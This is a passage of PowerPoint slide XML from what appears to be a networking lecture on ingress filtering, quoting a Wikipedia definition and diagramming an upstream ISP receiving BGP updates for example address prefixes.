              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="252525"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="252525"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="252525"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ingress filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a technique used to ensure that incoming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3" tooltip="Packet (information technology)"/>
              </a:rPr>
              <a:t>packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are actually from the networks from which they claim to originate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="252525"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- Wikipedia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5C4BCBE7-7B70-4BEF-9BFB-2B322DE0AFB5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="838200"/>
            <a:ext cx="11703050" cy="12096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5100" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ingress Filtering: Upstream ISP (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Freeform 3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3530600" y="2514600"/>
            <a:ext cx="2909888" cy="291465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1269" name="Freeform 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3268663" y="6188075"/>
            <a:ext cx="2909887" cy="291465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1270" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7278688" y="2852738"/>
            <a:ext cx="4175125" cy="641032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1271" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244600" y="2166938"/>
            <a:ext cx="1617663" cy="131921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1272" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244600" y="3808413"/>
            <a:ext cx="1498600" cy="131921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1273" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244600" y="5678488"/>
            <a:ext cx="1592263" cy="131762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1274" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1397000" y="7434263"/>
            <a:ext cx="1528763" cy="131921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1275" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2828925" y="2852738"/>
            <a:ext cx="738188" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11276" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2689225" y="4083050"/>
            <a:ext cx="895350" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11277" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2809875" y="6369050"/>
            <a:ext cx="511175" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11278" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2879725" y="7861300"/>
            <a:ext cx="474663" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11279" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5975350" y="7419975"/>
            <a:ext cx="2492375" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11280" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1118872" y="2387600"/>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a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>12.12.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11281" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1116491" y="4029075"/>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a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>34.34.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11282" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1237935" y="5856288"/>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a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>56.56.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11283" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1344613" y="7683501"/>
            <a:ext cx="1924050" cy="485259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>78.78.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11284" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5611813" y="4033838"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11341" name="Group 20"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11343" name="Oval 21"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11344" name="Line 22"/>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1345" name="Line 23"/>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1346" name="Rectangle 24"/>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Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11347" name="Oval 25"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="11348" name="Group 26"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11353" name="Line 2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1354" name="Line 2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1355" name="Line 2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1349" name="Group 30"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11350" name="Line 3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1351" name="Line 3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1352" name="Line 3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1342" name="Line 34"/>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1285" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7535863" y="4059238"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11326" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11328" name="Oval 37"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11329" name="Line 38"/>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1330" name="Line 39"/>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1331" name="Rectangle 40"/>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Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11332" name="Oval 41"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="11333" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11338" name="Line 4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1339" name="Line 4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1340" name="Line 4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1334" name="Group 46"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11335" name="Line 4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1336" name="Line 4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1337" name="Line 4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1327" name="Line 50"/>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1286" name="Group 51"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5443538" y="7327900"/>
            <a:ext cx="563562" cy="230188"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11311" name="Group 52"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11313" name="Oval 53"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11314" name="Line 54"/>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1315" name="Line 55"/>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1316" name="Rectangle 56"/>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Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11317" name="Oval 57"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="11318" name="Group 58"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11323" name="Line 5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1324" name="Line 6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1325" name="Line 6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1319" name="Group 62"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11320" name="Line 6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1321" name="Line 6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1322" name="Line 6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1312" name="Line 66"/>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1287" name="Group 67"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8429625" y="7326313"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11296" name="Group 68"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11298" name="Oval 69"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11299" name="Line 70"/>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1300" name="Line 71"/>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1301" name="Rectangle 72"/>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Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11302" name="Oval 73"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="11303" name="Group 74"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11308" name="Line 7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1309" name="Line 7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1310" name="Line 7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1304" name="Group 78"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11305" name="Line 7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1306" name="Line 8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1307" name="Line 8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1297" name="Line 82"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="11288" name="Line 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6200775" y="4135438"/>
            <a:ext cx="1373188" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11289" name="Text Box 84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5112910" y="2690813"/>
            <a:ext cx="1756631" cy="1054646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BGP update:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>12.12.0.0/24,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>34.35.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11290" name="Line 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6851650" y="3224213"/>
            <a:ext cx="388938" cy="15875"/>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11291" name="Text Box 86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4853354" y="6053138"/>
            <a:ext cx="1756631" cy="1054646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
